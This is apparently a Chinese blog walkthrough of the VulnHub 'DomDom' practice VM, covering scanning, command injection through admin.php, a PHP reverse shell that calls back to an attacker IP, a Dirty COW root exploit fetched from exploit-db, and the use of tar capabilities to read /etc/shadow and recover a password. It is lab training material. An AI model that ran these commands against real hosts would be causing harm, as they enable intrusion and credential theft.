dom靶场

靶场下载地址:

https://www.vulnhub.com/entry/domdom-1,328/

一、信息收集

获取主机ip

nmap -sP 192.168.16.0/24


netdiscover  -r 192.168.16.0/24

dom靶场_第1张图片

端口版本获取

 nmap -sV -sC -A  -p 1-65535 192.168.16.209

开放端口只有80

dom靶场_第2张图片

目录扫描

这里扫描php后缀的文件

gobuster  dir -u http://192.168.16.209    -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php

dom靶场_第3张图片

这里扫描出两个目录一个/index.php,一个 /admin.php.

二、RCE漏洞利用

查看登录的网站

dom靶场_第4张图片

dom靶场_第5张图片

抓包

使用burpsuite抓取登录后的包

dom靶场_第6张图片

把index.php更改为admin.php,发现存在cmd执行

dom靶场_第7张图片

参数更改:

name=ad&username=ad&password=ad&access=access&cmd=ls

命令被成功执行

dom靶场_第8张图片

nc反弹

1.开启监听

nc -lvnp 9002

2.反弹shell

这里使用python的shell

php -r '$sock=fsockopen("192.168.16.180",9002);exec("/bin/sh -i <&3 >&3 2>&3");'

进行加密后执行

dom靶场_第9张图片

会话获取成功

dom靶场_第10张图片

切换bash

python3 -c 'import pty;pty.spawn("/bin/bash")'

dom靶场_第11张图片

这里推荐一个

https://www.revshells.com/ 网站生成反弹shell网站

三、方法一、脏牛提权

获取版本

uname -a

得到系统版本为Linux ubuntu 4.4.0-21-generic

漏洞检测

漏洞检测脚本进行检测 https://github.com/mzet-/linux-exploit-suggester

下载到kali

使用

python -m http.server

或者直接

wget https://github.com/The-Z-Labs/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh   

dom靶场_第12张图片

添加上执行权限

chomd +x  linux-exploit-suggester.sh

执行

dom靶场_第13张图片

脏牛漏洞利用

exp下载:wget https://www.exploit-db.com/download/40616

编译:这里编译会报错,不用管

gcc exp.c -o exp -pthread

添加执行权限

chmod +x  exp

运行,提权成功

dom靶场_第14张图片

四、方法二、密码登陆提权

Linux系统利用可执行文件的Capabilities实现权限提升 - FreeBuf网络安全行业门户

Capabilities机制是在Linux内核2.2之后引入的,原理很简单,就是将之前与超级用户root(UID=0)关联的特权细分为不同的功能组

“Capabilities”(能力机制)是一种计算机安全模型,用于限制一个进程或用户在操作系统中能够执行的特定操作。它基于原则,即每个主体(进程或用户)只被授予执行特定操作所需的最低权限。

1.现在假设管理员对一些可执行文件设置了capabilities。测试人员通过下面的命令查找这些文件:

getcap -r / 2>/dev/null

dom靶场_第15张图片

2.Linux内核中Capabilities的实现机制对比

linux Capabilities简介–#setcap cap_net_raw,cap_net_admin=eip /a.out | (moonsec.com)

这里tar命令,可以绕过文件的读权限检查以及目录的读/执行权限的检查。

/bin/tar = cap_dac_read_search+ep

利用此特性我们可以读取系统中的敏感信息。

tar cvf shadow.tar /etc/shadow  //创建压缩文件
tar -xvf shadow.tar  //解压缩
chmod +r shadow  //赋予读权限
cat shadow | grep root  //查看shadow文件的内容

dom靶场_第16张图片

读取了/etc/shadow文件的内容

这里

tar -cvf domom.tar /home/domom
#打包home下的目录

解压

tar -xvf domom.tar

切换目录到桌面

ls 发现有个README.md,查看最后得到密码

Mj7AGmPR-m&Vf>Ry{}LJRBS5nc+*V.#a

dom靶场_第17张图片

登录成功

dom靶场_第18张图片

你可能感兴趣的:(Web安,网络安全学习,web安全,安全)